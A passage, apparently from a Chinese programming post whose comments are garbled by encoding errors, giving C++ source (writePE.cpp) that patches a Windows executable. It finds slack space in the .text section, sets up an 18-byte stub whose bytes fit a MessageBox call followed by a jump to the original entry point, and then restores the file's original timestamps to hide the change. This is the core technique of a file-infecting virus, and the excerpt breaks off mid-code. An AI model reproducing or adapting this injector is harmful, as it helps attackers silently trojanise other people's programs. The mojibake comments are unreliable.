----- -------- -------- 01 .text 0000CCC0 00001000 0000CE00 00000600 60000020 [CER] 02 .data 00004628 0000E000 00002C00 0000D400 C0000040 [IRW] 03 .rsrc 000003C8 00013000 00000400 00010000 40000040 [IR] Key to section flags: C - contains code E - executable I - contains initialized data R - readable W - writeable
é????èê?′????t?D′??ú3?????°??????μ?D??¢£?êμ?êé??ò??μ?′ú???éò?D′è?è?o?ò?????£??aà??ò????“.text”???£
ó?è???′ú??μ?μ?ò???PE??ê??é?′DD???tμ?í·D??¢£o
//writePE.cpp #include <windows.h> #include <stdio.h> #include <io.h> #include <fcntl.h> #include <time.h> #include <SYS\STAT.H> unsigned char writeline[18]={ 0x6a,0x40,0x6a,0x0,0x6a,0x0,0x6a,0x0,0xe8,0x01,0x0,0x0,0x0,0xe9,0x0,0x0,0x0,0x0 }; DWORD space; DWORD entryaddress; DWORD entrywrite; DWORD progRAV; DWORD oldentryaddress; DWORD newentryaddress; DWORD codeoffset; DWORD peaddress; DWORD flagaddress; DWORD flags; DWORD virtsize; DWORD physaddress; DWORD physsize; DWORD MessageBoxAadaddress; int main(int argc,char * * argv) { HANDLE hFile, hMapping; void *basepointer; FILETIME * Createtime; FILETIME * Accesstime; FILETIME * Writetime; Createtime = new FILETIME; Accesstime = new FILETIME; Writetime = new FILETIME; if ((hFile = CreateFile(argv[1], GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, 0)) == INVALID_HANDLE_VALUE)//′ò?aòaDT??μ????t { puts("(could not open)"); return EXIT_FAILURE; } if(!GetFileTime(hFile,Createtime,Accesstime,Writetime)) { printf("\nerror getfiletime: %d\n",GetLastError()); } //μ?μ?òaDT?????tμ?′′?¨?¢DT??μèê±?? if (!(hMapping = CreateFileMapping(hFile, 0, PAGE_READONLY | SEC_COMMIT, 0, 0, 0))) { puts("(mapping failed)"); CloseHandle(hFile); return EXIT_FAILURE; } if (!(basepointer = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0))) { puts("(view failed)"); CloseHandle(hMapping); CloseHandle(hFile); return EXIT_FAILURE; } //°????tí·ó3?ó′?è?baseointer CloseHandle(hMapping); CloseHandle(hFile); map_exe(basepointer);//μ?μ??à1?μ??· UnmapViewOfFile(basepointer); printaddress(); printf("\n\n"); if(space<50) { printf("\n????ì?D?,êy?Y2??üD′è?.\n"); } else { writefile();//D′???t } if ((hFile = CreateFile(argv[1], GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, 0)) == INVALID_HANDLE_VALUE) { puts("(could not open)"); return EXIT_FAILURE; } if(!SetFileTime(hFile,Createtime,Accesstime,Writetime)) { printf("error settime : %d\n",GetLastError()); } //???′DT??oó???tμ??¨á¢ê±??μè delete Createtime; delete Accesstime; delete Writetime; CloseHandle(hFile); return 0; } void map_exe(const void *base) { IMAGE_DOS_HEADER * dos_head; dos_head =(IMAGE_DOS_HEADER *)base; #include <pshpack1.h> typedef struct PE_HEADER_MAP { DWORD signature; IMAGE_FILE_HEADER _head; IMAGE_OPTIONAL_HEADER opt_head; IMAGE_SECTION_HEADER section_header[]; } peHeader; #include <poppack.h&g
|